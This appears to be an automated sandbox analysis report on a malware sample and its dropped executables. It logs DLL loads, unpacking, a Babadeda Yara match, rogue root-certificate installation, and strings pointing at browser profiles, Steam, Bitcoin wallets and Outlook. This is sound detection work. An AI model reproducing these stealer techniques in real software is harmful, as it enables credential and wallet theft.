Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000028001\build2.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1000028001\build2.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\1000028001\build2.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1000028001\build2.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1000028001\build2.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1000028001\build2.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000028001\build2.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1000028001\build2.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1000028001\build2.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000028001\build2.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1000028001\build2.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\AppData\Local\Temp\1000028001\build2.exe	Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Local\Temp\1000028001\build2.exe	Section loaded: webio.dll
Source: C:\Users\user\AppData\Local\Temp\1000028001\build2.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1000028001\build2.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000028001\build2.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\1000028001\build2.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1000028001\build2.exe	Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Temp\1000028001\build2.exe	Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\Temp\1000028001\build2.exe	Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1000028001\build2.exe	Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1000028001\build2.exe	Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\Temp\1000028001\build2.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1000028001\build2.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\1000028001\build2.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\1000028001\build2.exe	Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000028001\build2.exe	Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000028001\build2.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1000028001\build2.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1000028001\build2.exe	Section loaded: windowscodecs.dll
Source: C:\Users\user\AppData\Local\Temp\1000028001\build2.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\ba77748b9b.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\ba77748b9b.exe	Section loaded: msimg32.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\ba77748b9b.exe	Section loaded: msvcr100.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\ba77748b9b.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\ba77748b9b.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\ba77748b9b.exe	Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\ba77748b9b.exe	Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\ba77748b9b.exe	Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\ba77748b9b.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\ba77748b9b.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\ba77748b9b.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\ba77748b9b.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\ba77748b9b.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\ba77748b9b.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\ba77748b9b.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\ba77748b9b.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\ba77748b9b.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\ba77748b9b.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\ba77748b9b.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\ba77748b9b.exe	Section loaded: netutils.dll

Source: C:\Users\user\Desktop\file.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32

Jump to behavior

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\tasklist.exe tasklist

Source: Google Chrome.lnk.26.dr	LNK file: ..\..\..\Program Files\Google\Chrome\Application\chrome.exe
Source: Google Drive.lnk.31.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: YouTube.lnk.31.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Sheets.lnk.31.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Gmail.lnk.31.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Slides.lnk.31.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Docs.lnk.31.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Jump to behavior

Source: file.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: mozglue.pdbP source: file.exe, 00000000.00000002.2441623343.000000006C74D000.00000002.00000001.01000000.00000008.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb source: build2.exe, 0000002C.00000002.3032212263.000001F16D897000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: nss3.pdb@ source: file.exe, 00000000.00000002.2441873319.000000006C90F000.00000002.00000001.01000000.00000007.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb61252224y source: build2.exe, 0000002C.00000002.3032212263.000001F16D897000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: kf5nnj6lqkqsr=IsoWRKeOa8NsT%2FySFnivv8d%2FUT%2BPShDyrbUKZ%2BFrcmUbempXtmTRVghRPnUtoJ3%2B8V7a63iBYUxISc7YAhztHQ%3D%3D\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\profiles.inisP~ source: build2.exe, 0000002C.00000002.3032212263.000001F16D897000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdbes source: build2.exe, 0000002C.00000002.3032212263.000001F16D897000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb831BSOFTWARE\WOW6432Node\Valve\Steams source: build2.exe, 0000002C.00000002.3032212263.000001F16D897000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: ntdll.pdb source: build2.exe, 0000002C.00000002.3065381905.000001F170826000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3063680446.000001F16FC28000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3076823930.000001F171E22000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3071018908.000001F171228000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3063906502.000001F16FE22000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3075774507.000001F171A2F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3062001048.000001F16F628000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3077144572.000001F172028000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3065086020.000001F17062F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3064205964.000001F17002E000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3074566069.000001F171821000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3063359321.000001F16FA26000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3066892155.000001F170C2E000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3070101176.000001F17102F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3077496826.000001F172221000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3063037052.000001F16F82A000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3060290295.000001F16F42B000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3049800815.000001F16F22D000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3073050047.000001F171624000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3072097282.000001F17142E000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3065674034.000001F170A27000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3076246105.000001F171C2B000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3064778689.000001F170427000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3064530652.000001F170228000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3068425810.000001F170E28000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\profiles.iniCDBE0A5831 source: build2.exe, 0000002C.00000002.3032212263.000001F16D8AD000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: ntdll.pdbUGP source: build2.exe, 0000002C.00000002.3065381905.000001F170826000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3063680446.000001F16FC28000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3076823930.000001F171E22000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3071018908.000001F171228000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3063906502.000001F16FE22000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3075774507.000001F171A2F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3062001048.000001F16F628000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3077144572.000001F172028000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3065086020.000001F17062F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3064205964.000001F17002E000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3074566069.000001F171821000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3063359321.000001F16FA26000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3066892155.000001F170C2E000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3070101176.000001F17102F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3077496826.000001F172221000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3063037052.000001F16F82A000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3060290295.000001F16F42B000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3049800815.000001F16F22D000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3073050047.000001F171624000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3072097282.000001F17142E000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3065674034.000001F170A27000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3076246105.000001F171C2B000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3064778689.000001F170427000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3064530652.000001F170228000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.3068425810.000001F170E28000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: nss3.pdb source: file.exe, 00000000.00000002.2441873319.000000006C90F000.00000002.00000001.01000000.00000007.sdmp
Source:	Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\profiles.ini source: build2.exe, 0000002C.00000002.3032212263.000001F16D897000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: mozglue.pdb source: file.exe, 00000000.00000002.2441623343.000000006C74D000.00000002.00000001.01000000.00000008.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb612522248Software\Bitcoin\Bitcoin-Qtp source: build2.exe, 0000002C.00000002.3032212263.000001F16D897000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb source: build2.exe, 0000002C.00000002.3032212263.000001F16D897000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\profiles.ini source: build2.exe, 0000002C.00000002.3032212263.000001F16D8AD000.00000004.00001000.00020000.00000000.sdmp

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\file.exe	Unpacked PE file: 0.2.file.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.yoboy:R;.tezanaz:W;.rsrc:R; vs .text:EW;.rdata:R;.data:W;.reloc:R;
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	Unpacked PE file: 5.2.RoamingBKKFHIEGDH.exe.a50000.0.unpack :EW;.rsrc:W;.idata :W; :EW;etmksbbt:EW;iosnleeh:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;etmksbbt:EW;iosnleeh:EW;.taggant:EW;
Source: C:\Users\user\AppData\RoamingAEGIJKEHCA.exe	Unpacked PE file: 8.2.RoamingAEGIJKEHCA.exe.3e0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;owfltkii:EW;lwtisuou:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;owfltkii:EW;lwtisuou:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Unpacked PE file: 9.2.axplong.exe.ec0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;etmksbbt:EW;iosnleeh:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;etmksbbt:EW;iosnleeh:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Unpacked PE file: 10.2.axplong.exe.ec0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;etmksbbt:EW;iosnleeh:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;etmksbbt:EW;iosnleeh:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Unpacked PE file: 15.2.explorti.exe.9c0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;owfltkii:EW;lwtisuou:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;owfltkii:EW;lwtisuou:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Unpacked PE file: 16.2.explorti.exe.9c0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;owfltkii:EW;lwtisuou:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;owfltkii:EW;lwtisuou:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1000002001\ba77748b9b.exe	Unpacked PE file: 22.2.ba77748b9b.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.yoboy:R;.tezanaz:W;.rsrc:R; vs .text:EW;.rdata:R;.data:W;.reloc:R;
Source: C:\Users\user\AppData\Local\Temp\1000002001\ba77748b9b.exe	Unpacked PE file: 46.2.ba77748b9b.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.yoboy:R;.tezanaz:W;.rsrc:R; vs .text:EW;.rdata:R;.data:W;.reloc:R;

Detected unpacking (overwrites its own PE header)

Source: C:\Users\user\Desktop\file.exe	Unpacked PE file: 0.2.file.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\Temp\1000002001\ba77748b9b.exe	Unpacked PE file: 22.2.ba77748b9b.exe.400000.0.unpack
Source: C:\Users\user\1000003002\ead6a72944.exe	Unpacked PE file: 28.2.ead6a72944.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\Temp\1000002001\ba77748b9b.exe	Unpacked PE file: 46.2.ba77748b9b.exe.400000.0.unpack

Yara detected Babadeda

Source: Yara match	File source: 28.2.ead6a72944.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.0.ead6a72944.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: C:\Users\user\1000003002\ead6a72944.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\random[1].exe, type: DROPPED

Binary contains a suspicious time stamp

Source: buildred[1].exe.20.dr

Static PE information: 0xF4A21C47 [Fri Jan 22 01:32:55 2100 UTC]

Contains functionality to dynamically determine API calls

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_004195E0 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

0_2_004195E0

Entry point lies outside standard sections

Source: initial sample

Static PE information: section where entry point is pointing to: .taggant

PE file contains an invalid checksum

Source: PharmaciesDetection[1].exe.20.dr	Static PE information: real checksum: 0x0 should be: 0xdf9f4
Source: RoamingAEGIJKEHCA.exe.0.dr	Static PE information: real checksum: 0x1d4c28 should be: 0x1d2f04
Source: explorti.exe.8.dr	Static PE information: real checksum: 0x1d4c28 should be: 0x1d2f04
Source: buildred[1].exe.20.dr	Static PE information: real checksum: 0x0 should be: 0x56436
Source: random[1].exe0.19.dr	Static PE information: real checksum: 0x0 should be: 0x22727
Source: random[1].exe.0.dr	Static PE information: real checksum: 0x1e7836 should be: 0x1e246a
Source: build2[1].exe.20.dr	Static PE information: real checksum: 0x2a71a3 should be: 0x2ab10a
Source: buildred.exe.20.dr	Static PE information: real checksum: 0x0 should be: 0x56436
Source: RoamingBKKFHIEGDH.exe.0.dr	Static PE information: real checksum: 0x1e7836 should be: 0x1e246a
Source: build2.exe.20.dr	Static PE information: real checksum: 0x2a71a3 should be: 0x2ab10a
Source: axplong.exe.5.dr	Static PE information: real checksum: 0x1e7836 should be: 0x1e246a
Source: PharmaciesDetection.exe.20.dr	Static PE information: real checksum: 0x0 should be: 0xdf9f4
Source: enter[1].exe.0.dr	Static PE information: real checksum: 0x1d4c28 should be: 0x1d2f04
Source: ead6a72944.exe.19.dr	Static PE information: real checksum: 0x0 should be: 0x22727

PE file contains sections with non-standard names

Source: file.exe	Static PE information: section name: .yoboy
Source: file.exe	Static PE information: section name: .tezanaz
Source: msvcp140.dll.0.dr	Static PE information: section name: .didat
Source: msvcp140[1].dll.0.dr	Static PE information: section name: .didat
Source: nss3.dll.0.dr	Static PE information: section name: .00cfg
Source: nss3[1].dll.0.dr	Static PE information: section name: .00cfg
Source: softokn3.dll.0.dr	Static PE information: section name: .00cfg
Source: softokn3[1].dll.0.dr	Static PE information: section name: .00cfg
Source: freebl3.dll.0.dr	Static PE information: section name: .00cfg
Source: freebl3[1].dll.0.dr	Static PE information: section name: .00cfg
Source: mozglue.dll.0.dr	Static PE information: section name: .00cfg
Source: mozglue[1].dll.0.dr	Static PE information: section name: .00cfg
Source: random[1].exe.0.dr	Static PE information: section name:
Source: random[1].exe.0.dr	Static PE information: section name: .idata
Source: random[1].exe.0.dr	Static PE information: section name:
Source: random[1].exe.0.dr	Static PE information: section name: etmksbbt
Source: random[1].exe.0.dr	Static PE information: section name: iosnleeh
Source: random[1].exe.0.dr	Static PE information: section name: .taggant
Source: RoamingBKKFHIEGDH.exe.0.dr	Static PE information: section name:
Source: RoamingBKKFHIEGDH.exe.0.dr	Static PE information: section name: .idata
Source: RoamingBKKFHIEGDH.exe.0.dr	Static PE information: section name:
Source: RoamingBKKFHIEGDH.exe.0.dr	Static PE information: section name: etmksbbt
Source: RoamingBKKFHIEGDH.exe.0.dr	Static PE information: section name: iosnleeh
Source: RoamingBKKFHIEGDH.exe.0.dr	Static PE information: section name: .taggant
Source: enter[1].exe.0.dr	Static PE information: section name:
Source: enter[1].exe.0.dr	Static PE information: section name: .idata
Source: enter[1].exe.0.dr	Static PE information: section name:
Source: enter[1].exe.0.dr	Static PE information: section name: owfltkii
Source: enter[1].exe.0.dr	Static PE information: section name: lwtisuou
Source: enter[1].exe.0.dr	Static PE information: section name: .taggant
Source: RoamingAEGIJKEHCA.exe.0.dr	Static PE information: section name:
Source: RoamingAEGIJKEHCA.exe.0.dr	Static PE information: section name: .idata
Source: RoamingAEGIJKEHCA.exe.0.dr	Static PE information: section name:
Source: RoamingAEGIJKEHCA.exe.0.dr	Static PE information: section name: owfltkii
Source: RoamingAEGIJKEHCA.exe.0.dr	Static PE information: section name: lwtisuou
Source: RoamingAEGIJKEHCA.exe.0.dr	Static PE information: section name: .taggant
Source: axplong.exe.5.dr	Static PE information: section name:
Source: axplong.exe.5.dr	Static PE information: section name: .idata
Source: axplong.exe.5.dr	Static PE information: section name:
Source: axplong.exe.5.dr	Static PE information: section name: etmksbbt
Source: axplong.exe.5.dr	Static PE information: section name: iosnleeh
Source: axplong.exe.5.dr	Static PE information: section name: .taggant
Source: explorti.exe.8.dr	Static PE information: section name:
Source: explorti.exe.8.dr	Static PE information: section name: .idata
Source: explorti.exe.8.dr	Static PE information: section name:
Source: explorti.exe.8.dr	Static PE information: section name: owfltkii
Source: explorti.exe.8.dr	Static PE information: section name: lwtisuou
Source: explorti.exe.8.dr	Static PE information: section name: .taggant
Source: random[1].exe.19.dr	Static PE information: section name: .yoboy
Source: random[1].exe.19.dr	Static PE information: section name: .tezanaz
Source: ba77748b9b.exe.19.dr	Static PE information: section name: .yoboy
Source: ba77748b9b.exe.19.dr	Static PE information: section name: .tezanaz
Source: random[1].exe0.19.dr	Static PE information: section name: .code
Source: ead6a72944.exe.19.dr	Static PE information: section name: .code
Source: build2[1].exe.20.dr	Static PE information: section name: .xdata
Source: build2.exe.20.dr	Static PE information: section name: .xdata

Uses code obfuscation techniques (call, push, ret)

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0041A9F5 push ecx; ret		0_2_0041AA08
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C70B536 push ecx; ret		0_2_6C70B549

Source: file.exe	Static PE information: section name: .text entropy: 7.821310507065361
Source: random[1].exe.0.dr	Static PE information: section name: entropy: 7.979174049479235
Source: random[1].exe.0.dr	Static PE information: section name: etmksbbt entropy: 7.953652307689506
Source: RoamingBKKFHIEGDH.exe.0.dr	Static PE information: section name: entropy: 7.979174049479235
Source: RoamingBKKFHIEGDH.exe.0.dr	Static PE information: section name: etmksbbt entropy: 7.953652307689506
Source: enter[1].exe.0.dr	Static PE information: section name: entropy: 7.983907263958997
Source: enter[1].exe.0.dr	Static PE information: section name: owfltkii entropy: 7.952293456339948
Source: RoamingAEGIJKEHCA.exe.0.dr	Static PE information: section name: entropy: 7.983907263958997
Source: RoamingAEGIJKEHCA.exe.0.dr	Static PE information: section name: owfltkii entropy: 7.952293456339948
Source: axplong.exe.5.dr	Static PE information: section name: entropy: 7.979174049479235
Source: axplong.exe.5.dr	Static PE information: section name: etmksbbt entropy: 7.953652307689506
Source: explorti.exe.8.dr	Static PE information: section name: entropy: 7.983907263958997
Source: explorti.exe.8.dr	Static PE information: section name: owfltkii entropy: 7.952293456339948
Source: random[1].exe.19.dr	Static PE information: section name: .text entropy: 7.821310507065361
Source: ba77748b9b.exe.19.dr	Static PE information: section name: .text entropy: 7.821310507065361

Persistence and Installation Behavior

Drops PE files with a suspicious file extension

Source: C:\Windows\SysWOW64\cmd.exe

File created: C:\Users\user\AppData\Local\Temp\447331\Buyer.pif

Jump to dropped file

Installs new ROOT certificates

Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe

Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064 Blob

Drops PE files

Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\mozglue.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	File created: C:\Users\user\AppData\Local\Temp\1000002001\ba77748b9b.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\nss3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\msvcp140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\enter[1].exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\PharmaciesDetection[1].exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\msvcp140[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\freebl3[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File created: C:\Users\user\AppData\Local\Temp\1000025001\PharmaciesDetection.exe	Jump to dropped file
